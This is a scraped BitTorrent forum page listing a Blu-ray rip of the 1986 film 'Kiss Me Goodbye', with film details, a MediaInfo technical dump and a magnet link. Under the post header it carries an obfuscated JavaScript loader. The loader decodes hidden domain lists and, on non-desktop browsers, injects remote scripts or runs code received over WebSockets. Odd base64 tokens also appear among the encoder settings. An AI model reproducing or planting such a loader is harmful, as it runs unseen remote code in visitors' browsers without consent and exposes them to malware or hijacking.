Kiss Me Goodbye[国粤语音轨/中文字幕]迅雷下载.Kiss.Me.Goodbye.1986.1080p.BluRay.x264.DTS.5.1 11.01GB

版主小s 26天前 352

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎片 名 Kiss Me Goodbye

◎年 代 1986

◎产 地 美国

◎类 别

◎语 言 英语

◎上映日期 1986

◎IMDb评分 4.6/10 from 41 users

◎IMDb链接 https://www.imdb.com/title/tt0188773/

◎豆瓣评分 /10 from 0 users

◎豆瓣链接 https://movie.douban.com/subject/19995983/

◎标 签 美國 | Transgression | NoWave | Nick_Zedd | NickZedd | 80s | 186

◎简 介

暂无相关剧情介绍

  1. General

  2. Unique ID : 200810746621353424594976623144620415538 (0x9712BE35B9A9F5545388AC52C68E5A32)

  3. Complete name : Kiss.Me.Goodbye.1986.1080p.BluRay.x264.DTS.5.1-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.0 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate : 17.6 Mb/s

  9. Encoded date : UTC 2021-07-06 09:52:15

  10. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 29 min

  22. Bit rate : 14.6 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 032 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.306

  33. Stream size : 9.10 GiB (83%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio #1

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 29 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 510 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 966 MiB (9%)

  54. Title : Mandarin

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No


  58. Audio #2

  59. ID : 3

  60. Format : DTS

  61. Format/Info : Digital Theater Systems

  62. Codec ID : A_DTS

  63. Duration : 1 h 29 min

  64. Bit rate mode : Constant

  65. Bit rate : 1 510 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : C L R Ls Rs LFE

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 93.750 FPS (512 SPF)

  70. Bit depth : 24 bits

  71. Compression mode : Lossy

  72. Stream size : 966 MiB (9%)

  73. Title : Cantonese

  74. Language : Chinese

  75. Default : No

  76. Forced : No


  77. Text #1

  78. ID : 4

  79. ID in the original source medium : 4608 (0x1200)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 25 min

  85. Bit rate : 21.8 kb/s

  86. Count of elements : 1328

  87. Stream size : 13.3 MiB (0%)

  88. Title : cht

  89. Language : Chinese

  90. Default : Yes

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #2

  94. ID : 5

  95. ID in the original source medium : 4609 (0x1201)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 25 min

  101. Bit rate : 20.2 kb/s

  102. Count of elements : 1328

  103. Stream size : 12.3 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #3

  110. ID : 6

  111. ID in the original source medium : 4610 (0x1202)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 25 min

  117. Bit rate : 22.4 kb/s

  118. Count of elements : 1327

  119. Stream size : 13.7 MiB (0%)

  120. Title : eng

  121. Language : English

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Menu

  126. 00:00:00.000 : 第 01 章

  127. 00:07:51.166 : 第 02 章

  128. 00:16:12.833 : 第 03 章

  129. 00:24:45.625 : 第 04 章

  130. 00:31:37.375 : 第 05 章

  131. 00:38:10.708 : 第 06 章

  132. 00:44:14.458 : 第 07 章

  133. 00:51:58.333 : 第 08 章

  134. 01:00:41.541 : 第 09 章

  135. 01:09:33.416 : 第 10 章

  136. 01:15:09.000 : 第 11 章

  137. 01:23:16.875 : 第 12 章



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:EF39608A359940AE03D48FDCE456B221F968DAEB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回